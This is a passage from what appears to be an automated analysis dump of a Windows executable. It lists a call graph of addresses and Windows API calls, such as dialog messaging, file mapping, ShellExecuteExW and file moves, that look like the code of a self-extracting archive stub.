23360->23362 23364 a29319 23362->23364 23364->23351 23364->23359 23365->23338 23366->23340 23367->23349 23368->23350 23370 a28832 _free 23369->23370 23371 a28809 RtlFreeHeap 23369->23371 23370->23357 23371->23370 23372 a2881e 23371->23372 23378 a28c7a 20 API calls __dosmaperr 23372->23378 23374 a28824 GetLastError 23374->23370 23375->23355 23376->23360 23378->23374 25226 a23730 RtlUnwind 25187 a22637 48 API calls 25227 a1ff00 51 API calls 2 library calls 25190 a1d60b DialogBoxParamW 25231 a30310 IsProcessorFeaturePresent 25233 a1af60 100 API calls 24193 a1b170 24194 a1b17a __EH_prolog 24193->24194 24356 a0130b 24194->24356 24197 a1b85c 24422 a1cfee 24197->24422 24198 a1b1bc 24200 a1b232 24198->24200 24201 a1b1c9 24198->24201 24230 a1b1a8 24198->24230 24203 a1b2d1 GetDlgItemTextW 24200->24203 24208 a1b24c 24200->24208 24204 a1b205 24201->24204 24205 a1b1ce 24201->24205 24203->24204 24209 a1b307 24203->24209 24214 a1b226 EndDialog 24204->24214 24204->24230 24213 a0e0ac 51 API calls 24205->24213 24205->24230 24206 a1b888 24210 a1b891 SendDlgItemMessageW 24206->24210 24211 a1b8a2 GetDlgItem SendMessageW 24206->24211 24207 a1b87a SendMessageW 24207->24206 24212 a0e0ac 51 API calls 24208->24212 24215 a1b31f GetDlgItem 24209->24215 24354 a1b310 24209->24354 24210->24211 24440 a1a004 GetCurrentDirectoryW 24211->24440 24220 a1b26e SetDlgItemTextW 24212->24220 24221 a1b1e8 24213->24221 24214->24230 24218 a1b355 SetFocus 24215->24218 24219 a1b334 SendMessageW SendMessageW 24215->24219 24217 a1b8d2 GetDlgItem 24222 a1b8f5 SetWindowTextW 24217->24222 24223 a1b8ef 24217->24223 24224 a1b365 24218->24224 24225 a1b37d 24218->24225 24219->24218 24226 a1b27c 24220->24226 24460 a01241 SHGetMalloc 24221->24460 24441 a1a558 GetClassNameW 24222->24441 24223->24222 24229 a0e0ac 51 API calls 24224->24229 24245 a0e0ac 51 API calls 24225->24245 24226->24230 24235 a1b289 GetMessageW 24226->24235 24234 a1b36f 24229->24234 24231 a1b1ef 24231->24230 24236 a1b1f3 SetDlgItemTextW 24231->24236 24232 a1b7fc 24237 a0e0ac 51 API calls 24232->24237 24461 a1ce1e 24234->24461 24235->24230 24240 a1b2a0 IsDialogMessageW 24235->24240 24236->24230 24241 a1b80c SetDlgItemTextW 24237->24241 24240->24226 24243 a1b2af TranslateMessage DispatchMessageW 24240->24243 24244 a1b820 24241->24244 24243->24226 24246 a0e0ac 51 API calls 24244->24246 24248 a1b3b4 24245->24248 24249 a1b849 24246->24249 24247 a1b940 24253 a1b970 24247->24253 24258 a0e0ac 51 API calls 24247->24258 24254 a03f8f _swprintf 51 API calls 24248->24254 24256 a0e0ac 51 API calls 24249->24256 24250 a1b376 24366 a0a1ef 24250->24366 24252 a1c085 96 API calls 24252->24247 24260 a1c085 96 API calls 24253->24260 24292 a1ba28 24253->24292 24255 a1b3c6 24254->24255 24259 a1ce1e 16 API calls 24255->24259 24256->24230 24264 a1b953 SetDlgItemTextW 24258->24264 24259->24250 24265 a1b98b 24260->24265 24261 a1bad8 24266 a1bae1 EnableWindow 24261->24266 24267 a1baea 24261->24267 24262 a1b405 GetLastError 24263 a1b410 24262->24263 24372 a1a5b3 SetCurrentDirectoryW 24263->24372 24269 a0e0ac 51 API calls 24264->24269 24274 a1b99d 24265->24274 24293 a1b9c2 24265->24293 24266->24267 24271 a1bb07 24267->24271 24479 a012c8 GetDlgItem EnableWindow 24267->24479 24270 a1b967 SetDlgItemTextW 24269->24270 24270->24253 24273 a1bb2e 24271->24273 24282 a1bb26 SendMessageW 24271->24282 24272 a1b426 24277 a1b43d 24272->24277 24278 a1b42f GetLastError 24272->24278 24273->24230 24284 a0e0ac 51 API calls 24273->24284 24477 a19878 32 API calls 24274->24477 24275 a1ba1b 24279 a1c085 96 API calls 24275->24279 24283 a1b4b8 24277->24283 24287 a1b4c8 24277->24287 24289 a1b455 GetTickCount 24277->24289 24278->24277 24279->24292 24281 a1bafd 24480 a012c8 GetDlgItem EnableWindow 24281->24480 24282->24273 24283->24287 24288 a1b6fd 24283->24288 24291 a1bb47 SetDlgItemTextW 24284->24291 24285 a1b9b6 24285->24293 24295 a1b4e0 GetModuleFileNameW 24287->24295 24296 a1b698 24287->24296 24381 a012e6 GetDlgItem ShowWindow 24288->24381 24297 a03f8f _swprintf 51 API calls 24289->24297 24290 a1bab6 24478 a19878 32 API calls 24290->24478 24291->24230 24292->24261 24292->24290 24299 a0e0ac 51 API calls 24292->24299 24293->24275 24300 a1c085 96 API calls 24293->24300 24471 a0ee15 81 API calls 24295->24471 24296->24204 24308 a0e0ac 51 API calls 24296->24308 24303 a1b46e 24297->24303 24299->24292 24305 a1b9f0 24300->24305 24301 a1b70d 24382 a012e6 GetDlgItem ShowWindow 24301->24382 24373 a098be 24303->24373 24304 a1bad5 24304->24261 24305->24275 24309 a1b9f9 DialogBoxParamW 24305->24309 24307 a1b506 24311 a03f8f _swprintf 51 API calls 24307->24311 24312 a1b6ac 24308->24312 24309->24204 24309->24275 24310 a1b717 24313 a0e0ac 51 API calls 24310->24313 24314 a1b528 CreateFileMappingW 24311->24314 24315 a03f8f _swprintf 51 API calls 24312->24315 24317 a1b721 SetDlgItemTextW 24313->24317 24318 a1b58a GetCommandLineW 24314->24318 24349 a1b607 __vswprintf_c_l 24314->24349 24319 a1b6ca 24315->24319 24383 a012e6 GetDlgItem ShowWindow 24317->24383 24323 a1b59b 24318->24323 24332 a0e0ac 51 API calls 24319->24332 24320 a1b494 24324 a1b4a6 24320->24324 24325 a1b49b GetLastError 24320->24325 24321 a1b612 ShellExecuteExW 24347 a1b62f 24321->24347 24472 a1adbe SHGetMalloc 24323->24472 24328 a097f0 79 API calls 24324->24328 24325->24324 24326 a1b733 SetDlgItemTextW GetDlgItem 24329 a1b750 GetWindowLongW SetWindowLongW 24326->24329 24330 a1b768 24326->24330 24328->24283 24329->24330 24384 a1c085 24330->24384 24331 a1b5b7 24473 a1adbe SHGetMalloc 24331->24473 24332->24204 24336 a1b5c3 24474 a1adbe SHGetMalloc 24336->24474 24337 a1b672 24337->24296 24343 a1b688 UnmapViewOfFile CloseHandle 24337->24343 24338 a1c085 96 API calls 24341 a1b784 24338->24341 24340 a1b5cf 24475 a0ef88 81 API calls ___scrt_fastfail 24340->24475 24410 a1d3b2 24341->24410 24343->24296 24346 a1b5e6 MapViewOfFile 24346->24349 24347->24337 24350 a1b65e Sleep 24347->24350 24348 a1c085 96 API calls 24353 a1b7aa 24348->24353 24349->24321 24350->24337 24350->24347 24351 a1b7d3 24476 a012c8 GetDlgItem EnableWindow 24351->24476 24353->24351 24355 a1c085 96 API calls 24353->24355 24354->24204 24354->24232 24355->24351 24357 a01314 24356->24357 24358 a0136d 24356->24358 24360 a0137a 24357->24360 24481 a0dd73 24357->24481 24503 a0dd4c GetWindowLongW SetWindowLongW 24358->24503 24360->24197 24360->24198 24360->24230 24363 a01349 GetDlgItem 24363->24360 24364 a01359 24363->24364 24364->24360 24365 a0135f SetWindowTextW 24364->24365 24365->24360 24367 a0a1f9 24366->24367 24368 a0a2b3 24367->24368 24369 a0a28a 24367->24369 24514 a0a3fa 24367->24514 24368->24262 24368->24263 24369->24368 24370 a0a3fa 9 API calls 24369->24370 24370->24368 24372->24272 24374 a098c8 24373->24374 24375 a09932 CreateFileW 24374->24375 24376 a09926 24374->24376 24375->24376 24377 a09984 24376->24377 24378 a0b85c 2 API calls 24376->24378 24377->24320 24379 a0996b 24378->24379 24379->24377 24380 a0996f CreateFileW 24379->24380 24380->24377 24381->24301 24382->24310 24383->24326 24385 a1c08f __EH_prolog 24384->24385 24386 a1b776 24385->24386 24387 a1acc6 ExpandEnvironmentStringsW 24385->24387 24386->24338 24400 a1c0c6 _wcsrchr 24387->24400 24389 a1acc6 ExpandEnvironmentStringsW 24389->24400 24390 a1c3ad SetWindowTextW 24390->24400 24393 a0bb55 CharUpperW 24393->24400 24394 a238ae 22 API calls 24394->24400 24396 a1c19b SetFileAttributesW 24398 a1c255 GetFileAttributesW 24396->24398 24399 a1c1b5 ___scrt_fastfail 24396->24399 24398->24400 24402 a1c267 DeleteFileW 24398->24402 24399->24398 24399->24400 24537 a0b6e7 52 API calls _swprintf 24399->24537 24400->24386 24400->24389 24400->24390 24400->24393 24400->24394 24400->24396 24403 a1c577 GetDlgItem SetWindowTextW SendMessageW 24400->24403 24407 a1c5b7 SendMessageW 24400->24407 24535 a11ac4 CompareStringW 24400->24535 24536 a1a004 GetCurrentDirectoryW 24400->24536 24538 a0a71d 7 API calls 24400->24538 24539 a0a6a6 FindClose 24400->24539 24540 a1ae2a 74 API calls ___std_exception_copy 24400->24540 24402->24400 24404 a1c278 24402->24404 24403->24400 24405 a03f8f _swprintf 51 API calls 24404->24405 24406 a1c298 GetFileAttributesW 24405->24406 24406->24404 24408 a1c2ad MoveFileW 24406->24408 24407->24400 24408->24400 24409 a1c2c5 MoveFileExW 24408->24409 24409->24400 24411 a1d3bc __EH_prolog 24410->24411 24541 a10188 24411->24541 24413 a1d3ed 24545 a05bd9 24413->24545 24415 a1d40b 24549 a07d8e 24415->24549 24419 a1d45e 24566 a07e21 24419->24566 24421 a1b795 24421->24348 24423 a1cff8 24422->24423 24424 a19f7a 4 API calls 24423->24424 24425 a1cffd 24424->24425 24426 a1d005 GetWindow 24425->24426 24427 a1b862 24425->24427 24426->24427 24428 a1d025 24426->24428 24427->24206 24427->24207 24428->24427 24429 a1d032 GetClassNameW 24428->24429 24431 a1d056 GetWindowLongW 24428->24431 24432 a1d0ba GetWindow 24428->24432 25058 a11ac4 CompareStringW 24429->25058 24431->24432 24433 a1d066 SendMessageW 24431->24433 24432->24427 24432->24428 24433->24432 24434 a1d07c GetObjectW 24433->24434 25059 a19fba GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24434->25059 24436 a1d093 25060 a19f99 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24436->25060 25061 a1a1bd 8 API calls ___scrt_fastfail 24436->25061 24439 a1d0a4 SendMessageW DeleteObject 24439->24432 24440->24217 24442 a1a579 24441->24442 24446 a1a59e 24441->24446 25062 a11ac4 CompareStringW 24442->25062 24444 a1a58c 24445 a1a590 FindWindowExW 24444->24445 24444->24446 24445->24446 24447 a1aa53 24446->24447 24448 a1aa5d __EH_prolog 24447->24448 24449 a013a2 83 API calls 24448->24449 24450 a1aa7f 24449->24450 25063 a01f6f 24450->25063 24453 a1aa99 24455 a01653 84 API calls 24453->24455 24454 a1aaa8 24456 a01971 125 API calls 24454->24456 24459 a1aaa4 24455->24459 24457 a1aaca __vswprintf_c_l ___std_exception_copy 24456->24457 24458 a01653 84 API calls 24457->24458 24458->24459 24459->24247 24459->24252 24460->24231 24462 a1af04 5 API calls 24461->24462 24463 a1ce2a GetDlgItem 24462->24463 24464 a1ce80 SendMessageW SendMessageW 24463->24464 24465 a1ce4c 24463->24465 24466 a1cedb SendMessageW SendMessageW SendMessageW 24464->24466 24467 a1cebc 24464->24467 24468 a1ce57 ShowWindow SendMessageW SendMessageW 24465->24468 24469 a1cf31 SendMessageW 24466->24469 24470 a1cf0e SendMessageW 24466->24470 24467->24466 24468->24464 24469->24250 24470->24469 24471->24307 24472->24331 24473->24336 24474->24340 24475->24346 24476->24354 24477->24285 24478->24304 24479->24281 24480->24271 24482 a03f8f _swprintf 51 API calls 24481->24482 24483 a0dd9e 24482->24483 24484 a118ae WideCharToMultiByte 24483->24484 24497 a0ddb5 _strlen 24484->24497 24485 a0de30 24504 a0d3ae 24485->24504 24487 a0de48 GetWindowRect GetClientRect 24488 a0df37 24487->24488 24495 a0de9a 24487->24495 24489 a0df76 GetSystemMetrics GetWindow 24488->24489 24507 a0d431 24488->24507 24491 a0df97 24489->24491 24492 a01336 24489->24492 24491->24492 24501 a0dfaa GetWindowRect 24491->24501 24492->24360 24492->24363 24493 a0d588 26 API calls 24493->24497 24495->24489 24496 a0defd GetWindowLongW 24495->24496 24499 a0df27 GetWindowRect 24496->24499 24497->24485 24497->24493 24500 a0de0f SetDlgItemTextW 24497->24500 24498 a0df67 SetWindowTextW 24498->24489 24499->24488 24500->24497 24502 a0e01f GetWindow 24501->24502 24502->24491 24502->24492 24503->24360 24505 a0d431 52 API calls 24504->24505 24506 a0d3d0 24505->24506 24506->24487 24508 a03f8f _swprintf 51 API calls 24507->24508 24509 a0d456 24508->24509 24510 a118ae WideCharToMultiByte 24509->24510 24511 a0d46b 24510->24511 24512 a0d588 26 API calls 24511->24512 24513 a0d47c 24512->24513 24513->24489 24513->24498 24515 a0a407 24514->24515 24516 a0a42b 24515->24516 24517 a0a41e CreateDirectoryW 24515->24517 24518 a0a373 4 API calls 24516->24518 24517->24516 24519 a0a45e 24517->24519 24520 a0a431 24518->24520 24524 a0a46d 24519->24524 24527 a0a637 24519->24527 24521 a0a471 GetLastError 24520->24521 24522 a0b85c 2 API calls 24520->24522 24521->24524 24525 a0a447 24522->24525 24524->24367 24525->24521 24526 a0a44b CreateDirectoryW 24525->24526 24526->24519 24526->24521 24528 a1e630 24527->24528 24529 a0a644 SetFileAttributesW 24528->24529 24530 a0a687 24529->24530 24531 a0a65a 24529->24531 24530->24524 24532 a0b85c 2 API calls 24531->24532 24533 a0a66e 24532->24533 24533->24530 24534 a0a672 SetFileAttributesW 24533->24534 24534->24530 24535->24400 24536->24400 24537->24399 24538->24400 24539->24400 24540->24400 24542 a10195 24541->24542 24570 a017a9 24542->24570 24544 a101ad 24544->24413 24546 a10188 24545->24546 24547 a017a9 76 API calls 24546->24547 24548 a101ad 24547->24548 24548->24415 24550 a07d98 __EH_prolog 24549->24550 24587 a0ca2b 24550->24587 24552 a07db3 24553 a1e512 new 8 API calls 24552->24553 24555 a07ddd 24553->24555 24593 a1464c 24555->24593 24557 a07f05 24558 a07f0f 24557->24558 24559 a07f79 24558->24559 24622 a0a6b9 24558->24622 24562 a07fea 24559->24562 24565 a0a6b9 8 API calls 24559->24565 24600 a0850d 24559->24600 24561 a0802c 24561->24419 24562->24561 24628 a06d41 72 API calls 24562->24628 24565->24559 24567 a07e2f 24566->24567 24569 a07e36 24566->24569 24568 a11def 84 API calls 24567->24568 24568->24569 24571 a017bf 24570->24571 24582 a0181a __vswprintf_c_l 24570->24582 24572 a017e8 24571->24572 24583 a06e68 74 API calls __vswprintf_c_l 24571->24583 24574 a01847 24572->24574 24579 a01807 ___std_exception_copy 24572->24579 24576 a238ae 22 API calls 24574->24576 24575 a017de 24584 a06edc 73 API calls 24575->24584 24578 a0184e 24576->24578 24578->24582 24586 a06edc 73 API calls 24578->24586 24579->24582 24585 a06edc 73 API calls 24579->24585 24582->24544 24583->24575 24584->24572 24585->24582 24586->24582 24588 a0ca35 __EH_prolog 24587->24588 24589 a1e512 new 8 API calls 24588->24589 24590 a0ca78 24589->24590 24591 a1e512 new 8 API calls 24590->24591 24592 a0ca9c 24591->24592 24592->24552 24594 a14656 __EH_prolog 24593->24594 24595 a1e512 new 8 API calls 24594->24595 24596 a14672 24595->24596 24597 a07e0c 24596->24597 24599 a10995 78 API calls 24596->24599 24597->24557 24599->24597 24601 a08517 __EH_prolog 24600->24601 24629 a013a2 24601->24629 24603 a08532 24637 a0a097 24603->24637 24606 a08561 24762 a01653 24606->24762 24610 a085fc 24656 a086a5 24610->24656 24614 a0865c 24663 a01f20 24614->24663 24617 a08667 24617->24606 24667 a03a31 24617->24667 24677 a08709 24617->24677 24619 a0a6b9 8 API calls 24620 a0855d 24619->24620 24620->24606 24620->24610 24620->24619 24766 a0bcc8 CompareStringW 24620->24766 24623 a0a6ce 24622->24623 24624 a0a6d2 24623->24624 25046 a0a7e7 24623->25046 24624->24558 24626 a0a6e2 24626->24624 24627 a0a6e7 FindClose 24626->24627 24627->24624 24628->24561 24630 a013a7 __EH_prolog 24629->24630 24631 a0ca2b 8 API calls 24630->24631 24632 a013df 24631->24632 24633 a1e512 new 8 API calls 24632->24633 24636 a01438 ___scrt_fastfail 24632->24636 24634 a01425 24633->24634 24634->24636 24767 a0b26d 24634->24767 24636->24603 24638 a0a0ae 24637->24638 24639 a08548 24638->24639 24783 a06f43 76 API calls 24638->24783 24639->24606 24641 a019c6 24639->24641 24642 a019d0 __EH_prolog 24641->24642 24653 a01a20 24642->24653 24655 a01a05 24642->24655 24784 a01380 24642->24784 24644 a01b70 24787 a06d41 72 API calls 24644->24787 24646 a03a31 98 API calls 24650 a01bd3 24646->24650 24647 a01b80 24647->24646 24647->24655 24648 a01c1f 24654 a01c52 24648->24654 24648->24655 24788 a06d41 72 API calls 24648->24788 24650->24648 24651 a03a31 98 API calls 24650->24651 24651->24650 24652 a03a31 98 API calls 24652->24654 24653->24644 24653->24647 24653->24655 24654->24652 24654->24655 24655->24620 24657 a086b2 24656->24657 24806 a10ef6 GetSystemTime SystemTimeToFileTime 24657->24806 24659 a08616 24659->24614 24660 a11671 24659->24660 24808 a1d7d7 24660->24808 24664 a01f25 __EH_prolog 24663->24664 24666 a01f59 24664->24666 24816 a01971 24664->24816 24666->24617 24668 a03a41 24667->24668 24669 a03a3d 24667->24669 24670 a03a7c 24668->24670 24671 a03a6e 24668->24671 24669->24617 24974 a0276d 98 API calls 3 library calls 24670->24974 24673 a03aae 24671->24673 24973 a03206 86 API calls 3 library calls 24671->24973 24673->24617 24675 a03a7a 24675->24673 24975 a01fd3 72 API calls 24675->24975 24678 a08713 __EH_prolog 24677->24678 24679 a0874c 24678->24679 24687 a08750 24678->24687 24999 a186fd 100 API calls 24678->24999 24680 a08775 24679->24680 24685 a08808 24679->24685 24679->24687 24682 a08797 24680->24682 24680->24687 25000 a07c35 149 API calls 24680->25000 24682->24687 25001 a186fd 100 API calls 24682->25001 24685->24687 24976 a05dba 24685->24976 24687->24617 24688 a08893 24688->24687 24984 a083f8 24688->24984 24691 a08a03 24692 a0a6b9 8 API calls 24691->24692 24694 a08a6e 24691->24694 24692->24694 24693 a0cb95 81 API calls 24704 a08ac9 _memcmp 24693->24704 24988 a07e92 24694->24988 24696 a08bfe 24697 a08cd1 24696->24697 24705 a08c4d 24696->24705 24701 a08d2c 24697->24701 24715 a08cdc 24697->24715 24698 a08bf7 25004 a06d72 72 API calls 24698->25004 24712 a08cbe 24701->24712 25007 a0826d 96 API calls 24701->25007 24702 a0935c 24709 a097f0 79 API calls 24702->24709 24703 a08d2a 24706 a097f0 79 API calls 24703->24706 24704->24687 24704->24693 24704->24696 24704->24698 25002 a083c4 83 API calls 24704->25002 25003 a06d72 72 API calls 24704->25003 24707 a0a373 4 API calls 24705->24707 24705->24712 24706->24687 24710 a08c85 24707->24710 24709->24687 24710->24712 25005 a09508 96 API calls 24710->25005 24711 a08d97 24711->24702 24714 a09b29 GetFileType 24711->24714 24724 a08e02 24711->24724 24712->24703 24712->24711 24713 a0ac78 8 API calls 24717 a08e51 24713->24717 24719 a08dda 24714->24719 24715->24703 25006 a0804c 100 API calls 24715->25006 24720 a0ac78 8 API calls 24717->24720 24719->24724 25008 a06d72 72 API calls 24719->25008 24737 a08e67 24720->24737 24722 a08df0 25009 a070d6 75 API calls 24722->25009 24724->24713 24725 a08f2a 24726 a08f85 24725->24726 24727 a0908e 24725->24727 24728 a08ff7 24726->24728 24729 a08f95 24726->24729 24731 a090a0 24727->24731 24732 a090b4 24727->24732 24748 a08fb5 24727->24748 24730 a083f8 CharUpperW 24728->24730 24733 a08fdb 24729->24733 24741 a08fa3 24729->24741 24734 a09012 24730->24734 24735 a09477 120 API calls 24731->24735 24736 a12e9e 73 API calls 24732->24736 24733->24748 25012 a079d6 110 API calls 24733->25012 24744 a09045 24734->24744 24745 a0903b 24734->24745 24734->24748 24735->24748 24739 a090cd 24736->24739 24737->24725 25010 a09cc1 SetFilePointer GetLastError SetEndOfFile 24737->25010 24742 a12b4d 120 API calls 24739->24742 25011 a06d72 72 API calls 24741->25011 24742->24748 25014 a093b5 92 API calls __EH_prolog 24744->25014 25013 a0775c 84 API calls 24745->25013 24751 a091dc 24748->24751 25015 a06d72 72 API calls 24748->25015 24750 a092e7 24750->24702 24752 a0a637 4 API calls 24750->24752 24751->24702 24751->24750 24753 a09295 24751->24753 25016 a0a05f SetEndOfFile 24751->25016 24754 a09342 24752->24754 24994 a09f02 24753->24994 24754->24702 25017 a06d72 72 API calls 24754->25017 24757 a092dc 24759 a09870 75 API calls 24757->24759 24759->24750 24760 a09352 25018 a07002 74 API calls 24760->25018 24763 a01665 24762->24763 25034 a0cace 24763->25034 24766->24620 24768 a0b277 __EH_prolog 24767->24768 24773 a0ed5b 81 API calls 24768->24773 24770 a0b289 24774 a0b385 24770->24774 24773->24770 24775 a0b397 ___scrt_fastfail 24774->24775 24778 a10c23 24775->24778 24781 a10be3 GetCurrentProcess GetProcessAffinityMask 24778->24781 24782 a0b2ff 24781->24782 24782->24636 24783->24639 24789 a016f2 24784->24789 24786 a0139c 24786->24653 24787->24655 24788->24654 24791 a01708 24789->24791 24801 a01760 __vswprintf_c_l 24789->24801 24790 a01731 24792 a01787 24790->24792 24798 a0174d ___std_exception_copy 24790->24798 24791->24790 24802 a06e68 74 API calls __vswprintf_c_l 24791->24802 24795 a238ae 22 API calls 24792->24795 24794 a01727 24803 a06edc 73 API calls 24794->24803 24796 a0178e 24795->24796 24796->24801 24805 a06edc 73 API calls 24796->24805 24798->24801 24804 a06edc 73 API calls 24798->24804 24801->24786 24802->24794 24803->24790 24804->24801 24805->24801 24807 a10f26 __vsnwprintf_l 24806->24807 24807->24659 24809 a1d7e4 24808->24809 24810 a0e0ac 51 API calls 24809->24810 24811 a1d807 24810->24811 24812 a03f8f _swprintf 51 API calls 24811->24812 24813 a1d819 24812->24813 24814 a1ce1e 16 API calls 24813->24814 24815 a1168a 24814->24815 24815->24614 24817 a0197d 24816->24817 24818 a01981 24816->24818 24817->24666 24820 a018b6 24818->24820 24821 a01905 24820->24821 24822 a018c8 24820->24822 24828 a03e9d 24821->24828 24823 a03a31 98 API calls 24822->24823 24826 a018e8 24823->24826 24826->24817 24831 a03ea6 24828->24831 24829 a03a31 98 API calls 24829->24831 24830 a01926 24830->24826 24833 a01e20 24830->24833 24831->24829 24831->24830 24845 a10957 24831->24845 24834 a01e2a __EH_prolog 24833->24834 24853 a03ac2 24834->24853 24836 a01e54 24837 a016f2 76 API calls 24836->24837 24839 a01edb 24836->24839 24838 a01e6b 24837->24838 24881 a01869 76 API calls 24838->24881 24839->24826 24841 a01e83 24842 a01e8f 24841->24842 24882 a11692 MultiByteToWideChar 24841->24882 24883 a01869 76 API calls 24842->24883 24846 a1095e 24845->24846 24847 a10979 24846->24847 24851 a06e63 RaiseException __CxxThrowException@8 24846->24851 24849 a1098a SetThreadExecutionState 24847->24849 24852 a06e63 RaiseException __CxxThrowException@8 24847->24852 24849->24831 24851->24847 24852->24849 24854 a03acc __EH_prolog 24853->24854 24855 a03ae2 24854->24855 24856 a03afe 24854->24856 24912 a06d41 72 API calls 24855->24912 24857 a03d47 24856->24857 24861 a03b2a 24856->24861 24937 a06d41 72 API calls 24857->24937 24860 a03aed 24860->24836 24861->24860 24884 a12e9e 24861->24884 24863 a03bab 24864 a03c36 24863->24864 24880 a03ba2 24863->24880 24915 a0cb95 24863->24915 24897 a0ac78 24864->24897 24865 a03ba7 24865->24863 24914 a01fb9 76 API calls 24865->24914 24866 a03b97 24913 a06d41 72 API calls 24866->24913 24867 a03b79 24867->24863 24867->24865 24867->24866 24869 a03c49 24874 a03cc3 24869->24874 24875 a03ccd 24869->24875 24901 a09477 24874->24901 24921 a12b4d 24875->24921 24878 a03ccb 24878->24880 24930 a06d72 72 API calls 24878->24930 24931 a11def 24880->24931 24881->24841 24882->24842 24883->24839 24885 a12ead 24884->24885 24887 a12eb7 24884->24887 24938 a06edc 73 API calls 24885->24938 24888 a12efe ___std_exception_copy 24887->24888 24891 a12ef9 Concurrency::cancel_current_task 24887->24891 24896 a12f59 ___scrt_fastfail 24887->24896 24889 a13005 Concurrency::cancel_current_task 24888->24889 24890 a12f35 24888->24890 24888->24896 24941 a218c8 RaiseException 24889->24941 24939 a12dd7 73 API calls 4 library calls 24890->24939 24940 a218c8 RaiseException 24891->24940 24895 a1301d 24896->24867 24898 a0ac85 24897->24898 24900 a0ac8f 24897->24900 24899 a1e512 new 8 API calls 24898->24899 24899->24900 24900->24869 24902 a09481 __EH_prolog 24901->24902 24942 a07eec 24902->24942 24905 a01380 76 API calls 24906 a09493 24905->24906 24945 a0cc70 24906->24945 24908 a094a5 24910 a0cc70 115 API calls 24908->24910 24911 a094ed 24908->24911 24954 a0ce55 95 API calls __vswprintf_c_l 24908->24954 24910->24908 24911->24878 24912->24860 24913->24880 24914->24863 24916 a0cbb6 24915->24916 24917 a0cbc8 24915->24917 24955 a061c9 81 API calls 24916->24955 24956 a061c9 81 API calls 24917->24956 24920 a0cbc0 24920->24864 24922 a12b56 24921->24922 24923 a12b7f 24921->24923 24924 a12b75 24922->24924 24926 a12b6b 24922->24926 24929 a12b73 24922->24929 24923->24929 24971 a15120 120 API calls 2 library calls 24923->24971 24970 a15e38 115 API calls 24924->24970 24957 a16887 24926->24957 24929->24878 24930->24880 24933 a11df9 24931->24933 24932 a11e12 24972 a10a36 84 API calls 24932->24972 24933->24932 24936 a11e26 24933->24936 24935 a11e19 24935->24936 24937->24860 24938->24887 24939->24896 24940->24889 24941->24895 24943 a0aee5 GetVersionExW 24942->24943 24944 a07ef1 24943->24944 24944->24905 24951 a0cc86 __vswprintf_c_l 24945->24951 24946 a0cdfb 24947 a0ce23 24946->24947 24948 a0cc0f 6 API calls 24946->24948 24949 a10957 SetThreadExecutionState RaiseException 24947->24949 24948->24947 24952 a0cdf2 24949->24952 24950 a186fd 100 API calls 24950->24951 24951->24946 24951->24950 24951->24952 24953 a0ad60 89 API calls 24951->24953 24952->24908 24953->24951 24954->24908 24955->24920 24956->24920 24958 a130c9 73 API calls 24957->24958 24964 a16898 ___BuildCatchObject __vswprintf_c_l 24958->24964 24959 a0cc70 115 API calls 24959->24964 24960 a16c6a 24961 a14df4 96 API calls 24960->24961 24962 a16c7a __vswprintf_c_l 24961->24962 24962->24929 24963 a10d11 79 API calls 24963->24964 24964->24959 24964->24960 24964->24963 24965 a13a02 115 API calls 24964->24965 24966 a16cbc 115 API calls 24964->24966 24967 a10acc 86 API calls 24964->24967 24968 a13476 96 API calls 24964->24968 24969 a172ff 120 API calls 24964->24969 24965->24964 24966->24964 24967->24964 24968->24964 24969->24964 24970->24929 24971->24929 24972->24935 24973->24675 24974->24675 24975->24673 24977 a05dca 24976->24977 25019 a05ce7 24977->25019 24979 a05e35 24979->24688 24981 a05dfd 24981->24979 24982 a05e40 24981->24982 25024 a0af55 CompareStringW CharUpperW CompareStringW 24981->25024 24982->24979 25025 a10104 CompareStringW 24982->25025 24985 a08417 24984->24985 25031 a11ab5 CharUpperW 24985->25031 24987 a084c1 24987->24691 24989 a07ea1 24988->24989 24990 a07ee1 24989->24990 25032 a070b8 72 API calls 24989->25032 24990->24704 24992 a07ed9 25033 a06d41 72 API calls 24992->25033 24995 a09f22 24994->24995 24996 a09f13 24994->24996 24998 a09f9b SetFileTime 24995->24998 24996->24995 24997 a09f19 FlushFileBuffers 24996->24997 24997->24995 24998->24757 24999->24679 25000->24682 25001->24687 25002->24704 25003->24704 25004->24696 25005->24712 25006->24703 25007->24712 25008->24722 25009->24724 25010->24725 25011->24748 25012->24748 25013->24748 25014->24748 25015->24751 25016->24753 25017->24760 25018->24702 25026 a05be4 25019->25026 25021 a05d08 25021->24981 25023 a05be4 3 API calls 25023->25021 25024->24981 25025->24979 25029 a05bee 25026->25029 25027 a05cd6 25027->25021 25027->25023 25029->25027 25030 a0af55 CompareStringW CharUpperW CompareStringW 25029->25030 25030->25029 25031->24987 25032->24992 25033->24990 25035 a0cadf 25034->25035 25040 a0aafe 25035->25040 25037 a0cb11 25038 a0aafe 84 API calls 25037->25038 25039 a0cb1c 25038->25039 25041 a0ab21 25040->25041 25043 a0ab35 25040->25043 25045 a10a36 84 API calls 25041->25045 25043->25037 25044 a0ab28 25044->25043 25045->25044 25047 a0a7f1 25046->25047 25048 a0a884 FindNextFileW 25047->25048 25049 a0a814 FindFirstFileW 25047->25049 25052 a0a8a3 25048->25052 25053 a0a88f GetLastError 25048->25053 25050 a0a868 25049->25050 25051 a0a82b 25049->25051 25050->24626 25054 a0b85c 2 API calls 25051->25054 25052->25050 25053->25052 25055 a0a840 25054->25055 25056 a0a844 FindFirstFileW 25055->25056 25057 a0a85d GetLastError 25055->25057 25056->25050 25056->25057 25057->25050 25058->24428 25059->24436 25060->24436 25061->24439 25062->24444 25064 a0a097 76 API calls 25063->25064 25065 a01f7b 25064->25065 25066 a019c6 98 API calls 25065->25066 25069 a01f98 25065->25069 25067 a01f88 25066->25067 25067->25069 25070 a06d41 72 API calls 25067->25070 25069->24453 25069->24454 25070->25069 25071 a1ed70 25076 a1f303 SetUnhandledExceptionFilter 25071->25076 25073 a1ed75 pre_c_initialization 25077 a286ba 26 API calls 2 library calls 25073->25077 25075 a1ed80 25076->25073 25077->25075 25235 a1bb70 91 API calls _swprintf 25193 a2ec70 51 API calls 25194 a25a70 QueryPerformanceFrequency QueryPerformanceCounter 25236 a2a170 31 API calls 2 library calls 25237 a29f70 71 API calls _free 25238 a0ed73 FreeLibrary 25239 a1e772 38 API calls 2 library calls 25195 a01075 83 API calls pre_c_initialization 25199 a09840 79 API calls 25242 a28340 8 API calls ___vcrt_uninitialize 25139 a1db4e 19 API calls ___delayLoadHelper2@8 25244 a1cf50 70 API calls 25245 a22150 6 API calls 4 library calls 25246 a2b950 GetCommandLineA GetCommandLineW 